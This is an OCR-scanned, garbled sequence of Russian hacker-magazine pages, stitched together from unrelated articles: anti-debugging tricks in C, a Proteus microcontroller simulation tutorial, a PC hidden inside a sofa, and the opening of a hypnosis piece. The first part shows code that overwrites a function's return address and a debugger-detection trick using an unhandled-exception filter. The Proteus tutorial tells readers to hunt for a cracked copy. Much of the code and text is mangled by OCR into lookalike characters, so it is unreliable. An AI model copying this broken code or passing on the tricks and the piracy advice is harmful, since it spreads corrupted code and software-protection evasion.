тем, что каждая функция имеетсвой стековый фрейм, свои аргументы и 
т.д., и потому попытка перехода в середину «чуждой» функции в общем 
случае ведет к краху программы, даже если использовать различные 
ассемблерные извращения. 

Структурные исключения позволяют передавать управление за пределы 
функции, однако о них знают практически все хакеры, и устроить им 
ловушку не получится. Только время зря потратим. К тому же дальнобой- 
ность структурных исключений также ограничена телом одной функции, а 
для ловли исключений за ее пределами приходится прибегать к ассемб- 
лерным вставкам и ручной установке фильтра посредством модификации I 

указателя, хранящегося в ячейке Р5:[0]. Но, во-первых, это нельзя пере- № ~ 

Аи й 

нести, а во-вторых, на Р5:[0] легко установить точку останова на доступ 
к данным, и тогда отладчик будет отлавливать все исключения и утраты 
управления над отлаживаемой программой не произойдет. 

Я полагаю, что самое лучшее, что можно сделать, — подменить адрес воз- 
врата из функции. Для этого даже необязательно прибегать к ассемблеру р 
и можно получить практически полностью переносимый вариант, что 



очень даже хорошо 



В упрощенном виде реализация выглядиттак: 



ПОДМЕНА АДРЕСА ВОЗВРАТА 

ИЗ ФУНКЦИИ БЕЗ АССЕМБЛЕРНЫХ ИЗВРАЩЕНИЙ 



// функция, вызываемая из боо 
// путем подмены адреса возврата 
ссіесі Ъаг(іпб а, іпб Ь) 
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// печатаем аргументы 
ргіпбб("%х, %х ***\п" , а, Ь) ; 






// сейчас на верпгине стека расположен 
// указатель на функцию ехіб, которой 
/ / и будет передано управление при 
// выходе из функции Ъаг 



} 



сбесі боо(іпб а, іт Ь) 

{ 

// подменяем адрес возврата в шаіп 
/ / на адрес функции Ъаг , которой 
/ / и будет передано управление 
*( (іпб*)&а— 1 ) = (іпб*)Ьаг; 



} 



// вызываем боо 
боо ( ( іпі: ) ехіб , 2) 



/ / сюда мы уже не вернемся 



} 



исключений мы уже говорили. Да и не только мы говорили. Об этом все 
говорят. Толку-то от этих исключений... Это даже не антиотладочный 
прием, а так... Однако в ѵѵіп32 АРІ есть одна довольно любопытная 
функция ЭеШпЬапсІІесІЕхсербопРіиег, устанавливающая фильтр для 
необрабатываемых исключений, получающий управление только в том 
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случае, если программа находится не под отладкой. Причем это не баг, 
а документированная фича. Если отладчикустановлен, то все необра- 
батываемые исключения будет ловить он. До выполнения фильтра дело 



просто не дойдет! 



Рассмотрим простой пример: 



ПРОГРАММА, ЗАЩИЩЕННАЯ ФИЛЬТРОМ 
НЕОБРАБАТЫВАЕМЫХ ИСКЛЮЧЕНИЙ 

// делитель 
іпі: а = 0; 



// фильтр необрабатываемых исключений 

// (выполняется, только когда программа не под отладкой) 
ЬОЫС Ѵ7ІЫАРІ боо ( 

збгисб _ЕХСЕРТІОЫ_РОШГЕК8 *ЕхсербіопІпбо 



) 



{ 



// отмечаем свое присутствие на экране 
ргіпбб ( » ***\п" ) ; 



// увеличиваем делитель 
а++ ; 



// пытаемся разделить еще раз 
г е Сига -1 ; 



Идея основана на том, что в Си-соглашении аргументы функции зано- 
сятся в стек справа налево, то есть в момент вызова функции на вершине 
стека оказывается крайний левый аргумент, поверх которого забрасы- 
вается адрес возврата. Получив указатель на крайний левый аргумент 
(что можно сделать легальными средствами) и уменьшив его на величину 
машинного слова, мы локализуем положение адреса возврата, которое 
можно беспрепятственно модифицировать по своему усмотрению, в 
частности заменить его адресом другой функции (в данном случае это 
функция Ьаг). 

Конструкция «( (іпІ*](&а) — 1 )» определяет местоположение адреса воз- 
врата, опираясь на тот факт, что на 32-разрядных платформах указатель 
на функцию имеет размер, равный 32 битам, и потому может адресо- 
ваться как іпі;*. Это единственный системно-зависимый участок, и, 
чтобы избываться от зависимости, необходимо вместо іпі* использовать 
указатели на функцию, однако они имеют чуть более сложный синтаксис, 
загромождающий пример лишними круглыми скобками, что отнюдь не 
способствует его пониманию. 

При запуске программы на экран вывалится «2, 1 2ббс0 ***». Как легко 
заметить, аргументы функции Ьагоказались сдвинутыми на одну по- 
зицию. Почему это произошло? А потому что передача управления на 
Ьаг осуществляется командой РЕТ, которая работает как ЛѵІР, то есть 
совершает прыжок на Ьаг, забыв положить в стекадрес возврата, роль 
которого приходится играть аргументу а функции !оо, соответствующему 
аргументу Ь функции Ьаг. Следовательно, чтобы сохранить все аргументы, 
необходимо добавить к функции боо один фиктивный аргумент, располо- 
женный слева. 



шаіп ( ) 
{ 



щ *р=0 ; іпі Ъ=0 ; 



// устанавливаем фильтр необрабатываемых исключений 
ЗеШпІіапбІесІЕхсербіопЕіІбег (боо) ; 



// совершаем недопустимую операцию 
Ь = Ь /а; 



// отмечаем свое присутствие на экране 
ргіпбб ( "Ъеге ! \п" ) ; 



} 



I необрабатываемые исключения 

) 0 возможности передачи управления посредством структурных 



При нормальном выполнении программа выбрасывает исключение, 
возникающее при делении на ноль, подхватываемое функцией-фильт- 
ром боо, которая выводит на экран «***», увеличивает делитель на 
единицу, повторяя операцию деления еще раз. В результате этого все 
работает нормально и ни одной мыши при выполнении программы не 
страдает. 

А теперь запустим программу под ОНуОеЬиддег’ом или другим приклад- 
ным отладчиком. И что же?! Отладчик, спотыкнувшись об исключение, 
застывает, как кролик перед питоном. Попытаемся передать исклю- 
чение в программу (в ОНуОеЬиддег’е это 5Ы61-Р7/Р8/Р9). Обычно это 
помогает, но только не сейчас! Отладчик зацикливается на исключе- 
нии, отлавливая его вновь и вновь, а все потому, что функция-фильтр, 
увеличивающая делитель, не получаетуправления и увеличивать его 
становится некому. 

ЭобІІСЕ (будучи запущенным) также всплывает, ругаясь на исключение 
(даже если программа и не находится под отладкой), но после выхода из 
него все продолжает работать без проблем. А потому против ЭобІІСЕ этот 
прием реально никак не действует, хотя если исключения будут сыпать- 
ся как из рога изобилия, то хакеру придется конкретно попотеть! ц-ц 
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Железо. . . Как много в этом звуке для сердца фрикера слилось. Плох тот фрикер, который 
не умеет самостоятельно делать себе девайсы. Да и не фрикер это вовсе. А железо мало 
придумать, его еще нужно разработать, отладить, протестировать. На это уходит зачас- 
тую уйма времени, особенно когда разбираешься в каком-либо новом контроллере или 
навороченной микрухе. Нужны эксперименты... Однако не все так страшно! 

Вот ты думаешь, что наша фрикерская братва с утра до вечера просиживает за своими 
паяльными станциями, укуриваясь до одурения парами голландского флюса? Нет, не 
спорю, некоторые так и делают, и в этом тоже есть огромная польза — практический 
опыт, но те, что попродвинутее, предпочитают моделирование схем на компе. Сейчас я 
научу тебя разрабатывать, отлаживать и получать на выходе почти готовое железо, даже 
не притрагиваясь к паяльнику и деталям. 



Н КЛЕЩИ, МОЛОТОК, ТОПОР — ВОТ КУЛХАЦКЕРА НАБОР! 

Вообще, существует масса систем моделирования электронных схем. Из 
всех, что я видел, мне больше всего понравились МиШзіт и 1515 Ргоіеиз. 
МиШзіт обладает практичным интерфейсом, и в нем удобно отлаживать 
аналоговые схемы. Он позволяет использовать виртуальные транзисторы 
(параметры ты указываешь сам) и усилители, но совершенно не поддержи- 
вает сложные системы, вроде микроконтроллеров или разного рода драй- 
веров. Напротив, Ргоіеиз замечательно умеет работать с контроллерами, 
но ограничен своей библиотекой реальных элементов, поэтому без знания 
того, какая именно детальтебе нужна, ты там мало что сделаешь. Вдобавок 
он обладаетубогим интерфейсом. Однако это лучшая система моделирова- 
ния изтех, что мне доводилось видеть, а потому описывать буду именно ее. 

г 1515 РКОТЕДО — ТВОЯ ЛАБОРАТОРИЯ 

Итак, не будем тут растекаться припоем по дорожкам, а приступим кделу. 
Для начала качни Ргоіеиз. Веситон порядка 30 метров в архиве. Самая поз- 
дняя версия, которая мне известна, — это 7.2, вотее и ищи. Учти только, что 
крякнутая версия Ргоіеиз работаетпорой ну оченьстранно, например, код 
процессора виден, а отладка не идет и в регистрах левые значения. Потому 
ищи тщательно :). Скачал — установи! Думаю, с этим ты справишься сам, а 
потому приступлю ксобственно описанию этой чумовой проги. 

Предлагаю сразуже взять быка за рога и быстренько смоделировать какую- 
нибудь несложную схему на микроконтроллере. Объяснять где что я буду по 
ходу дел а. 



Запускай Ргоіеиз (ярлык 1515 7 РгоІ'еБзіопаІ — прим. Оііпу)), сразуже должно 
открыться бежевое окно в точечках. Это рабочее поле. Тут мы и построим 
нашу схему. Для примера сварганим схему на моем любимом контроллере 
АТ89С51 . Она не будет делать ничего особенного, просто будет отсылать 
в окошко терминала буковки по нажатиям кнопок, приделанных к портам 
контроллера. Нечто похожее, только на контроллере АТМеда8535, было 
описано мной в прошлом номере «Хакера» — там мы рулили мобильным 
телефоном. 

Чтобы добавить компонент, нужно вначале выбрать черную стрелку в 
левом верхнем углу, а потом нажать кнопочку с лупой и треугольником (на 
скриншотах я постарался все тебе подписать), она расположена посереди- 
не верхней панели инструментов. Откроется огромный список элементов, 
которые знает Ргоіеиз. Библиотеки постоянно дополняются и обновляются, 
поэтому пошарь по инету в поисках новых деталек. 

Найди в списке контроллер АТ89С51 . Чтобы не возиться, заюзай поиск по 
ключевым словам: набери просто «АТ89» и увидишь все семейство М5С-51 , 
известное Ргоіеиз’у. 

Выбирай нужный и тыкай ОК. После этого помещай микросхему в удобное 
тебе место. Сразу оговорюсь, что модели процов в Ргоіеив несколько упро- 
щены, поэтому они не требуют наличия в виртуальной схеме кварца, систе- 
мы сброса (подтяжка ВЕ5ЕТ до нужного уровня). Об этом следует помнить, 
когда в итоге ты будешь делать реальную схему. В противном случае искать 
причину неработоспособности схемы можно очень долго. 

Хоть они и не нужны, но детали обвески мы все же добавим. Опять ты кай 
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на лупу стреугольником и ищи там кварц, буржуи зовутего сгузіаі — вот 
его и ставь на схему рядом с выводами ХТАІ_. Главная убогость интерфейса 
Ргоіеив заключается втом, что правый клик всегда сначала выделяет, а по- 
том удаляет компонент, а левый ставит новый такой же. Ужасно напрягает! 

В МиШвіт все сделанотрадиционнее и в разыудобнее, но, увы, МиШвіт 
не столь могуч. Теперь наведи курсор на вывод кварца и соедини его с вы- 
водом ХТАЬІ -процессора, то же проделай и со второй ногой кварца, только 
дляХТАІ_2. 

Теперь нам нужны кондеры. Снова лезь в библиотеку и ищи там СарасіШгв. 
Ты увидишь огромный список реальных кондеров, выбери какой-нибудь 
5МТ-конденсатор емкостью порядка 33 пф. В верхнем окошке справа будет 
его обозначение в схеме, а внизу габаритные размеры, аточнее, контакт- 
ные площадки под его запайку. 

Кстати, посмотри на окошко чуть ниже строки поиска. Видишь там строку 
Мобеііпд РгітШѵе?Там есть виртуальные примитивы. Они не имеют корпу- 
са, потому при разводке печатной платы выскочат с ошибкой, но если ты не 
собираешься разводить плату, а лишь хочешь смоделить схему, то возьми 
лучше их — ихзначения можно менять какугодно. 

Воткни пару кондеров рядом с кварцем и повесь их на ноги кварца одним 
выводом, а второй объедини и повесь на землю. Где взятьземлю?Хороший 
вопрос :). Ищи в левой панели инструментов такие две фиговины, похожие 
на бирки, зовутся они Тегтіпаі тобе. Тыкай туда. Рядом слева откроется 
панелька, где нужно будет выбрать строку СРОИМ й — это и есть земля. 
Установи ее там, где тебе удобно. Роѵѵегтамже — это напряжение питания 
схемы. Обычно оно общее, но иногда могут быть заморочки стем, чтоу 
схемы множественное питание (как, например, в компе: там и 5, и 1 2, и 3,3 В 
— и вообще тьма разных напряжений). 

Далее надо собрать схему сброса. РгоШив’у это не требуется, он и так будет 
нормально отрабатывать, но реальной схеме это нужно. Делается это 
просто. Ставим резистор и конденсатор. При включении, когда конденсатор 
не заряжен, его сопротивление равно нулю и на вывод Р5Т подается +5 В, 
то есть логическая единица. Кактолько кондер зарядится — это произойдет 
через пару миллисекунд — ножка через резистор будетлежать на земле, а 
это уже самый настоящий логический ноль, и проц запустится в штатном 
режиме. 

Сделай всетак, какпоказано на картинке, и приступай к навеске кнопок 
на наш девайс. Вешать лучше на порт 1 . Почему? Да потому, что резисторы 
дополнительные не нужны. Дело втом, чтоу С51 порт 0 сделан с возмож- 
ностью работы на шине данных, то есть имееттак называемое 2-состояние. 
Это когда на выходе не 1 и не 0, высокое сопротивление (импеданс), почти 
обрыв, но порт может в это время без палева снифать шину на предмет 
пролетающихтам значений, ничуть не выдавая себя и не мешая другим 
устройствам. ПортЗ обвешан всякой дополнительной периферией, а порт 
2 не оченьудобно расположен в модели Ргоіеиз’а. Поэтому используем 
порт 1. Ищи в библиотеке какой-нибудь вѵѵйсН или ЬиНоп. Мне нравится 



компонент Ьи^оп, потому я заюзаю именно его. Ставлю четыре кнопочки 
и вешаю их на выводы Р 1 .0, Р1 .2, Р1 .4, Р1 .6, а другие выводы кнопки кладу 
всем скопом на землю. Какэто будет работать? Да очень просто! Вначале 
вывожу в порт единичку на все выводы. Ножки изнутри сразу же подтяги- 
ваются к логической единице. Теперь, чтобы считать данные, достаточно 
забратьзначение из регистра порта Р1 , а если мы нажимаем какую-либо 
из кнопок, то эта ножка жестко сажается на землю, пересиливая внутрен- 
ний подтягдо единицы. То есть нажатая кнопка дает в порту ноль на своем 
бите. Такой принцип определения нажатия кнопки действителен для всех 
микроконтроллеров. Также настоятельно рекомендую шунтировать кнопки 
конденсаторами на 40 пф — не будетложных срабатываний от импульсных 
помех (шунтировать — подключать параллельно кнопке — прим. Оііпу]). Это 
касается реальныхустройств, в Ргоіеиз'е это не сыграет никакой роли, но я 
все же добавлю. Все, ввод данных готов. Теперь надо сделать вывод. 

Для вывода можнотупо повесить на ножки виртуальные светодиоды и вир- 
туально ими помигать, но это моветон, хотя, не спорю, зачастую помогает 
отлаживать программу. Я же предпочитаю побаловаться моим любимым 
ІІАРТ’ом. Проще говоря, терминалкой. Лезем в раздел виртуальных прибо- 
ров. Находим на левой панели инструментов пиктограмму с нарисованным 
стрелочным прибором и заходим туда. Там нашему взору будет представлен 
список всякого хлама, который мы можем юзать: и вольтметр, и амперметр, 
и осциллограф, и цифровой анализатор, и разныеузкоспециализирован- 
ные приблуды вроде монитора протокола 5РІ или І2С. Для прикола возьми 
осциллограф (озсіііозсоре) и повесь его одним каналом на выводТхО. 

Еще нам понадобится ѴігШаІТегтіпаІ.. Выбирай его и вставляй на схему. А 
теперь соединяй его выходы с выходами проца крест-накрест. РхсТх, Тх с 
Рх. Готово! 

Ну и для полного счастья поставь еще светодиод на порт Р2. Как под- 
ключать светодиоды к портам проца? Да очень просто! Плюс светодиода 
вешаешь на питание, а минус — на резистор, а этот резистор — уже на 
выход процессора. Чтобы зажечь диод, на эту ногу надо выдать ноль. Тогда 
разница между напряжением питания и напряжением нуля на ножке будет 
максимальной и диод загорится. Ищи в компонентах І_ЕО, ну и втыкай его, 
как я тебе сказал. 

Ты уже, наверное, обратил внимание, что событие мы чаще определяем 
или устанавливаем по нулю, а не по единице. Это связано стем, что легче 
получить ноль принудительно, чем подтягивать ножки вверх. Но это далеко 
не всегда так, например контроллеры семейства АѴРумеютсвои ножки 
наглухо сажать и на ноль, и на напряжение питания, так что там диод зажечь 
можно и единичкой. Для этого его надо будет перевернуть и вторым концом 
через резистор повесить не на Роѵѵег, а на землю. 

В ІТ5 ЫѴЕ! ІТ’5 І.ІѴЕ! 

Так, аппаратную часть мы нарисовали. Пора приступать к настройке 
и отладке. Код и прошивку ты найдешь на диске — я не буду на них 
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подробно останавливаться, сделав упор на настройку компилятора и 
отладчика в 1515 Ргоіеиз. 

Выдели микроконтроллер и кликни на нем дважды — откроется окно 
свойств. 

РСВ Раскасіде — это тип корпуса, он важен при разводке печатной платы. 
Пусть стоит ОІІ_40. 

Ргодгат Рііе — это собственно файл прошивки. Вот сюда нужно прописать 
путь к бех-файлу. 

Сіоск Ргедиепсу — частота, на которой будет работать проц. В реале частота 
зависит от кварца или от встроенного тактового генератора. В Ргоіеиз’е 
она выставляется тут. Укажи ее правильно, так как дефолтные значения 
зачастую отличаются оттех, что ты собрался юзать. 

Итак, выставь нужную частоту проца, пропиши путь к прошивке, и на этом 
настройка схемы будетзавершена. Можно запускать отладку. 

Жми кнопку с значком Ріау, как на магнитофоне. Тут все просто, никаких 
сложностей. Отмечутолько, что пошаговый режим — это просто прерыви- 
стый запуске небольшой временной задержкой. 

Теперьтвоя схема работает. Можешь понаблюдать процессы, происходя- 
щие в ней. Если выберешь в панели инструментов вольтметр, то увидишь 
напряжение. А если за юзать амперметр, можно измерить ток. Цветные 
квадратики, что зажглись на ножках процессора, — это логические уров- 
ни. Синий— ноль, он же земля. Красный — логическая единица, а серый 
— это высокий импеданс, он же Ні-2. В принципе уже этого достаточно, 
чтобы отладить работу девайса. А что, отлаживаем прогу в Кеіі иѴізіоп 
(если речь идет о С51 ) или в АѴР 5іибіо, ком пил им и смотрим, что получи- 
лось. Это отлично работаетна простых девайсах с одним управляющим 
контроллером и обвязкой. 

Но вот когда у тебя в системе пашет несколько микроконтроллеров 
или контроллер и какое-либо шибко умное устройство, например ключ 
ОаИав, то тут начинается неслабый геморрой, так кактрудно сказать, 
в какой момент времени какой из контроллеров что выполняет. В 



такой ситуации нам на помощь придет внутренний отладчик Ргоіеиз, 
позволяющий отлаживать программу по исходному коду, не выходя из 
программы. 

В ВСКРЫВАЕМ ЧЕРЕП КОНТРОЛЛЕРУ 

Итак, действие первое. Нам надо добавить в наш проект исходник. Залезь 
в меню, отыщи там пункт 5оигсе и смело ткни в него недрогнувшей рукой. 
Выбирай Абб/Ретоѵе воигсе и добавляй исходник. Чтобы компилятор не 
тупил, исходники советую ныкать по простым путям, без пробелов и русских 
букв. Например, каку меня: «б:\собіпд\С51\І~іаск_2.а5ПП». Добавляя исход- 
ник, не забудь указать компилятор, которым его надо будет компилить. Для 
этого случая в Собе депегабоп бэоіз надо указать А5ЕМ51 , то есть компиля- 
тор архитектуры МС5-51 . 

Жми О К, и в меню 5оигсе появится еще один пункт — добавленный исход- 
ный файл, при выборе которого автоматом открывается редактор, и можно 
оперативно подправить текст программы. 

Действие второе. Настройка компилятора. Снова лезь в меню 5оигсе и ищи 
там пункт Оебпе Собе бепегабоп Тооіз — это опции компилера. Изначально 
они настроены криво — в разделе Маке гиіезтычь в строку Соглтапб І_іпе 
и выноси оттуда весь мусор, что там есть. Оставьтолько «%1 » без кавычек. 
А5ЕМ51 — умная зараза, он сам добавит нужные файлы с описаниями 
регистров и переменных, тем более чтоу семейства МС5-51 все адреса 
одинаковые. 

Действиетретье.Жми втомже меню5оигсе пункт Виііб АНи получай на вы- 
ходе Ьех-файл, но уже местной выделки. Там же моргнетокно компилятора, 
в котором будут сведения об ошибках и ряд служебных данных. 

Действие четвертое. Запускай схему кнопкой Ріау в нижней панельке и 
сразу же устанавливай либо паузу, либо пошаговый режим. Должно от- 
крыться окно с кодом программы, как в уже привычном тебе отладчике. 
Если не открылось, то ты можешь найти его вменю «ОеЬид -> 8051 С РІІ 
Зоигсе Собе — III». Там же будет масса других полезных вещей, как, 



Лазерный утюг — 
оружие настоящего 
джедая! 

Лазерный утюг — это широко известная технология изготовления 
печатных плат почти промышленного качества. Вкратце это можно 
описать так: рисунок платы в зеркальном отображении печатается 
на лазерном принтере, затем отпечаток накладывается на тексто- 



лит и проглаживается утюгом. Бумага смывается, а тонер остается. 
Далее это дело кидается в раствор хлорного железа, и через минут 
30 ты становишься счастливым обладателем печатной платы с 
абсолютно ровными и красивыми дорожками. От себя добавлю, что 
идеальным материалом для печати является подложка от самокле- 
ющихся пленок — ее не надо отмачивать, можно просто оторвать. 
Погугли по ключевым словам «изготовление плат методом ЛУТ» и 
найдешь миллион и одну публикацию на эту тему. Кстати, с поста 
про ЛУТ началось сообщество ги_га<біо_е1есГг в ЖЖ. Можешь коп- 
нуть в сообществе, там навалом постов по этой теме, как моих, так 
иОІіпу]. 
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Схема в сборе 



Передача данных по ІЛАРТ. На осциллографе виден пакет битов, летящих 
по проводу 



например, содержимое регистров процессора или памяти программ/ 
данных. 

Ну а далее все просто — обычный отладчик, в котором ты, надеюсь, работал 
уже не раз. Кнопочки вверху окна исходного кода управляют исполнением 
кода. 

НАЗНАЧЕНИЕ КНОПОК 

Красный бегущий чувак — запуск кода на исполнение . 

Нога, перепрыгивающая через фиговину, — исполнение с 
пропуском процедур . 

Нога со стрелкой вниз — выполнить одну инструкцию, сде- 
лать шаг . 

Нога со стрелкой вверх — выйти из подпрограммы. 

Нога и стрелка вперед — исполнять до курсора . 

Кружочки со стрелочками — установка /снятие /отключение 
точек останова Вгеакроіпб . Брейкпоинт — это такое место в 
программе, где твоя прога встанет как вкопанная, и дальше 
пойдет лишь с твоего согласия, незаменимая вещь при от- 
ладке . 




При добавлении в проект второго проца его код, регистры и память будут 
там же, но называться будут уже 5оигсе Собе — 1)2 ит.д. 

Крометого, в директории Ргоіеив’а есть папка 5АМРІ_Е5 — в ней куча 
разных весьма сложных примеров, показывающих возможности системы 
1515 Ргоіеиз. 

В АКЕ5 — РАЗВОДИТ НЕ ПО-ДЕТСКИ! 

Итак, ты отладил схему, все работает, виртуально все отлично. В 
принципе все уже готово, пора мутить печатную плату. Если схема 
простая, то лучше взять 5ргіп1 І_ауоіЛ и развести схему вручную. 

Но если и это влом.то можно за юзать встроенный в Ргоіеиз трас- 
сировщик — АРЕ5. Но для этого при составлении схемы нужно, 
во-первых, указать тип корпуса абсолютно всех элементов, а 
во-вторых, не забыть разного рода кварцы и конденсаторы, без ко- 
торых в Ргоіеив’е модель работать будет, а вот в реале, возможно, 
даже не запустится. 

Для перехода в АВЕ5 достаточно лишь нажать кнопочку с надписью 
«АВЕ5» в верхней части экрана. Очевидно, не правда ли? Ргоіеиз 
предложит сохранить соединения в ЫеД-ізІ:, скажи да и приступай 
к разводке платы. Сразу предупрежу, что развести печатную плату 
можно только на секс — долгий и нудный трах с проводочками, гоняя 
их туда-сюда. Следя, чтобы все было подключено и нигде не коротну- 
ло, чтобы дорожки не оказывались слишком узкими и было как можно 
меньше перемычек или чтобы они не пытались лезть между ножками 
микросхем. В домашних условиях такие платы разводить — сущее 
мучение. 



Скажу честно, в АРЕ5я особо не врубался, так какобычно развожу платы 
вручную, поэтому синяки и шишки о его интерфейс™ будешь набивать 
без меня. Могутолько дать парочку советов. Во-первых, среди инстру- 
ментов АВЕ5 есть две мегавещи. Первая — это АиІюРІасег, оптимально 
размещающий компоненты на плате. Вторая — это АиІоВоиІег, красиво 
автоматом разводящая все дорожки. Для того чтобы эти штуки сработали, 
нужно указать границы платы. Поэтому найди там внизу экрана селектор 
слоев, выдели на нем желтый слой (Воагб Ебде) и нарисуй в рабочем поле 
какой-нибудь замкнутый контур (на правой панели инструментов увидишь 
такие салатового цвета квадрат, круг, линию... хм, задницу... вот ими и надо 
нарисовать границы платы). Когда укажешь границы платы, можешь смело 
жать сначала АиІоРІасег, а потом АиіоРоиІег. Их кнопочки расположены на 
верхней панели инструментов. 

Когда после недели шаманских манипуляций с автотрассировщиком ты 
наконец получишь адекватный результат, можешь считать, что ты достиг 
просветления и обрел силу. Теперь, как истинный фри к- джедай, ты имеешь 
полное право заюзать лазерный утюги изготовить себе печатную плату 
девайса. 

Н ЗАКЛЮЧЕНИЕ 

Теперьты понимаешь, что для достижения просветления не нужно корпеть 
с паялом в руках сутками, покупая горы деталей, и материться, когда твоя 
схема в очередной раз запылает синим пламенем. Все значительно проще 
— моделируй схемы на компе, отлаживай. И только когда все заработает в 
вирте, переноси в реал. Удачи хацкер! И-И 
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НИКОЛАЙ ШВАРЦ 

/ 2220НЕІ.І-МАІ1-.ВІІ / 



ДИВАННЫМ 
МОДДИНГ 



Куда спрятать круглосуточно 



аботающий комп 



Анлим — величайшее изобретение человечества. Именно поэтому после перехода на но- 
вый тарифный план в моей однокомнатной квартире появился второй компьютер, посто- 
янно качающий (и, естественно, раздающий) тонны разного софта, фильмов и музыки. 
Стоял он, конечно же, на кухне. Рядом подмигивал светодиодами роутер, коннект был 
надежным, скорость — достаточной... Но однажды случилась беда... 



Н ,ЕЯ 

Беда пришла в виде известия отом, что моя 
супруга заказала на кухню новый диван (в на- 
роде именуемый «уголком»). Он оказался мяг- 
ким и удобным, но, увы, занял место у стены, 
где ранее ютились комп и роутер. Поскольку я 
не захотел избавляться от дивана (уж больно 
удобно было, сидя на нем, поглощать яичницу 
с пивом), потребовалось срочно изыскивать 
место для «умных железок». Как вскоре выяс- 
нилось, под сидением дивана было специаль- 
ное отделение для всякого стаффа. Замеры 
показали, что системный блоктуда прекрасно 
поместится. Решение было принято, и, когда 
супруга отправилась в магазин, чтобы не 
видеть издевательств над новой мебелью, я с 
улыбкой протер от пыли любимый дремель. 

г ПРИСТУПИМ 

В первую очередь стоило подумать об 
охлаждении. Поскольку вся конструкция 
должна была быть скрыта от глаз, я решил не 
заморачиваться на вентиляторах с подсветкой 
и хромированных решетках. В компьютерном 
хламе нашлисьдва больших вентилятора на 
12 В, оста вал ось только соединить их парал- 



лельно и подключить к разъему на материнке. 
Первыеже полевые испытания показали, что 
охлаждается вся система превосходно, но вот 
шумит, как взлетающий «Боинг». К проводу 
питания вентиляторов срочно был припаян 
разъем 115В, и они были переведены на низко- 
калорийную пятивольтовую диету. Шума сразу 
стало заметно меньше. Уже потом я подумал, 
что почти того же эффекта можно было добить- 
ся, соединив вентиляторы последовательно и 
запитав их от 1 2 В. 

Воодушевившись, я начал вырезать отверстия 
под вентиляторы. Поленившись пилить орга- 
литдремелем с диском, я просто насверлил в 
нем дырок и потом прорезал тем же сверлом 
перемычки. Получилось некрасиво, но быстро 
(для красоты можно обработать края полукруг- 
лым напильником по дереву— прим. Оііпуі). 
Теперь стоило подумать о поступлении 
холодного воздуха, поскольку крышка дивана 
закрывалась практически герметично, а вен- 
тиляторы, естественно, работали в режиме 
вытяжки. Сколько дырок надо просверлить? 
Ну чем больше, тем лучше, конечно. Впрочем, 
выполнив небольшой подсчет, можно изба- 
вить себя отлишней работы. Будем исходить 



из того, что суммарная площадь дырок, через 
которые воздух поступает, должна быть не 
меньше площади дырок, через которые он же 
вытягивается. Считаем. Диаметр дырки под 
большой вентилятор — 50 мм. Площадь ее, 
соответственно, составит [Рі]*сі 2 /4 или 1960 
мм 2 . Два вентилятора — это 3920 мм 2 . 

Диаметр сверла, которым я дырявил дно 
дивана, — 5 мм. Считаем площадь каждой 
дырки по той же формуле, что и перед этим. 
Получается 19,6 мм 2 . 

Путем деления одного на другое выясняем, 
что нам потребуется сделать не менее 200 
дырок. Сказано — сделано. 

В ТЕСТИРОВАНИЕ СИСТЕМЫ 

Осталось совсем немного: подключить все 
компоненты, прикрутить вентиляторы к дну 
и, помолившись, запускать систему. И не 
забудь установить ПАсІтіп или подобную 
утилиту, чтобы управлять компьютером по 
сети. Настрой ВІ05, чтобы он не ругался на 
отсутствие клавиатуры, а система при случай- 
ном отключении напряжения нетребовала 
нажатия Роѵѵег, а сразу запускалась. В Винде 
(я использую наибезглючнейший Бегѵег 2000) 
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113 В — это не только 
ценный порт. . . 

Мой роутер оборудован двумя портами ИЗВ 2.0 для подключения 
внешнего винта или сетевого принтера. Впрочем, ничего не мешает за- 
питать от него систему охлаждения. Это может понадобиться, скажем, 
во время отпуска, когда компьютер отключается, а охлаждать систему 
все равно надо (роутер ощутимо греется) . Главное — не перестараться 
и не спалить порт слишком мощной нагрузкой. Смотрим на наклейку 
вентилятора: при напряжении 12 В ток составляет 0,13 А. Считаем 
сопротивление обмотки: 12/0,13=92 Ома. Токпри напряжении 5 В 
составит 5/92 = 0,05 А. Значит, два вентилятора будут отъедать от порта 
ИЗВ всего 0,1 А (при максимуме 0,5 А) . Таким образом, можно не боять- 
ся и подключать нашу охладительную систему к роутеру. 



Доработка 

После окончания монтажа и запуска системы я стал убирать на место 
инструменты. И тут в ящике со всяким барахлом обнаружилась 
симпатичная прозрачная коробочка от какого-то электронного 
девайса, заботливо не выброшенная мной в мусор пару месяцев на- 
зад. Небольшая доработка ножницами — и теплоотводящий короб 
готов. Осталось закрепить его подходящим винтом и прорезать в 
многострадальном дне дивана еще одно отверстие. Открываем окно 
ЗреебРап, и выясняется, что мы без лишнего шума отвоевали еще 
три градуса! Мораль: никогда не выбрасывай старые пластиковые 
коробочки. 




разреши автологин. Для снижения энерго- 
потребления (а значит, и меньшего нагрева) 
стоит отключить все лишнее: светодиоды 
(светодиоды так мало потребляют, что это, 
в общем-то, неактуально — прим. ЭПпуі'), 
СЭ-привод (если он не нужен). Особо стоит 
отметить, что крышку с одного бока систем- 
ника (того, которым он ложится на дно) надо 
снять. Тогда воздух через грамотно просвер- 
ленные дырки будет попадать сразу в корпус 
компа, вытягиваться оттуда вентилятором Б П 
и удаляться из дивана двумя прикрученными 



нами вентиляторами. Практика показала, что 
эта стройная система работает без перегрева 
при наличии не более трех винчестеров и не 
слишком «горячего» проца. Так что хорошего 
тебе коннекта! 

г ЗАКЛЮЧЕНИЕ. 

Чем проще, тем проще. 

Рискну навлечь на себя гнев моддинг-гуру, но 
скажу, что в данном случае на первом месте 
стояла не красота и оригинальность, а на- 
дежность и дешевизна решения. Я обошелся 



подручными материалами и инструментами, 
а работа заняла никак не больше нескольких 
часов. Бесспорно, можно использовать в 
качестве вытягивающего кулера вентилятор 
из БП, можно организовать бескулерную 
систему с минимальным тепловыделением 
— да мало ли что можно придумать, если 
есть время, силы и мозги. Поэтому не стоит 
рассматривать описанный мод как догму. Я 
просто поделился своим рецептом. ПС 
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А я давно у 
три своих с 
в коридоре, 
охлаждением 
и теперь в 
у меня все л 
переделывать 



Вырезаем дырки под вентиляторы. Главное* 
— это не красота, а точная разметка ^ 



Собираем 
ную систему. Помни, 
что пайка гораздо 
надежнее 



КП, вот это крутая тема! 
Давно об этом думал, 
а чувак взял и сделал. 
Респект Коле Шварцу! 
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Путешествие 
в зачарованный 
мир 



ГРЕЧЕСКИМ СОН НУРИОЗ: ПРАВДА, МИФЫ И РАЗОБЛАЧЕНИЯ 



Практически все слышали о гипнозе. Он упоминается во многих местах: от газетных ис- 
торий о зомбировании до многотомных самоучителей, недостатка в которых испытывать 
не приходится. Но попытки применить полученные знания на практике конкретно обла- 
